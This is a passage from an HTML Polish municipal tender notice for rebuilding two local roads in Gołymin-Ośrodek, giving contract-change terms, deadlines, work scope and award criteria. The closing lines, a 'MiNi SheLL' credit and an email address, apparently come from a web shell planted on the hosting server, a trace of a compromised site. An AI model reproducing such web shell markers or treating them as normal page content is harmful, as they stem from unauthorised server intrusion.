5)	Zmiany parametrów materiałów, urządzeń lub wyposażenia, wynikających z niedostępności danych produktów na rynku, na nie gorsze niż zaprojektowane, po zaakceptowaniu zmiany przez Nadzór Inwestorski                  i Zamawiającego;
6)	Zaistnienia konieczności zrealizowania robót przy zastosowaniu innych rozwiązań technicznych / technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.
7)	Wynagrodzenie Wykonawcy określone w umowie może ulec zmianie                w przypadku rezygnacji z wykonania części robót, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - wynagrodzenie zostanie pomniejszone o wartość robót zmniejszonych wg kosztorysu ofertowego;
8)	 Zmiana stawki podatku VAT w związku ze zmianą ustawową tej stawki,               w stopniu wynikającym z tej zmiany. W przypadku zmiany ustawowej stawki podatku VAT cena ryczałtowa netto nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.golymin-osrodek.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Urząd gminy Gołymin-Osrodek, ul. Szosa Ciechanowska 8, 06-420 Gołymin-Ośrodek- pokój nr 1 -parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2016 godzina 11:00, miejsce: Urząd Gminy Gołymin-Osrodek, ul. Szosa Ciechanowska 8, 06-420 Gołymin-Ośrodek- pokój nr 18 -sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi gminnej nr 120441W w miejscowości Chruściele..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej nr 120441W w miejscowości Chruściele na długości 308.82 m, szerokość jezdni zmienna 4,50 - 5,00 m.  
Miejsce realizacji zamówienia:
Inwestycja realizowana będzie na działce nr 122 położonej w obrębie geodezyjnym Wróblewko na terenie miejscowości Chruściele.Zakres prac obejmuje:a) Roboty przygotowawcze :-  roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym (w tym wykonanie inwentaryzacji geodezyjnej powykonawczej)b) Jezdnia - podbudowa z kruszywa naturalnego - warstwa górna o grubości 5cm po zagęszczeniu- warstwa wyrównawcza z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 5 cm. - powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 16-25 w ilości 18,0 dm3/m2 - warstwa 1 - powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 12-16 w ilości 13,0 dm3/m2 - warstwa 2
- powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 8-12 w ilości 10,0 dm3/m2 - warstwa 3- powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 5-8 w ilości 8,0 dm3/m2 - warstwa 4.c) Inżynieria ruchu :- słupki do znaków drogowych z rur stalowych o średnicy 50 mm - przymocowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych, informacyjnych o powierzchni do 0,3 m2. d) Roboty wykończeniowe :- odtworzenie rowów - wykopy rowów i kanałów melioracyjnych oraz wykopy przy regulacji rzek wykonywane koparkami podsiębiernymi 0,25 m3 na odkład   w gruncie kat. I - II 0 objętości do 1,50 m3/m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.42-6, 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ul. Ogrodowej (drogi wewnętrznej)             w miejscowości Gołymin-Ośrodek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa ul. Ogrodowej (drogi wewnętrznej) w miejscowości Gołymin-Ośrodek na długości 168,34 m, szerokość jezdni 5,0 m.
Miejsce realizacji zamówienia:
Inwestycja realizowana będzie na działkach nr 197 i nr 203/1 położonych w obrębie geodezyjnym Gołymin-Ośrodek.
Zakres prac obejmuje:
a) Roboty przygotowawcze :-  roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym (w tym wykonanie inwentaryzacji geodezyjnej powykonawczej)-  ręczne usunięcie warstwy ziemi urodzajnej (humusu) o grubości 15 cm z darnią z przewozem taczkami                                 
b) Jezdnia :- podbudowa z kruszywa naturalnego - warstwa górna o grubości 5cm po  zagęszczeniu - warstwa wyrównawcza z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 5 cm.- nawierzchnia z mieszanek mineralno - bitumicznych grysowych - warstwa wiążąca asfaltowa - grubości po zagęszczeniu 4 cm.- nawierzchnia mieszanek mineralno - bitumicznych grysowych - warstwa ścieralna
asfaltowa - grubość po zgęszczeniu 4 cm. c) Przepusty:- oczyszczenie przepustów  o śr. 1.0 m z namułu. d) Inżynieria ruchu :- słupki do znaków drogowych z rur stalowych o średnicy 50 mm.- przymocowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych, informacyjnych o powierzchni do 0,3 m2. e) Roboty wykończeniowe :- odtworzenie rowów - wykopy rowów i kanałów melioracyjnych oraz wykopy przy regulacji rzek wykonywane koparkami podsiębiernymi 0,25 m3 na odkład   w gruncie kat. I - II 0 objętości do 1,50 m3/m- regulacja pionowa studzienek dla zaworów wodociągowych i gazowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.42-6, 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com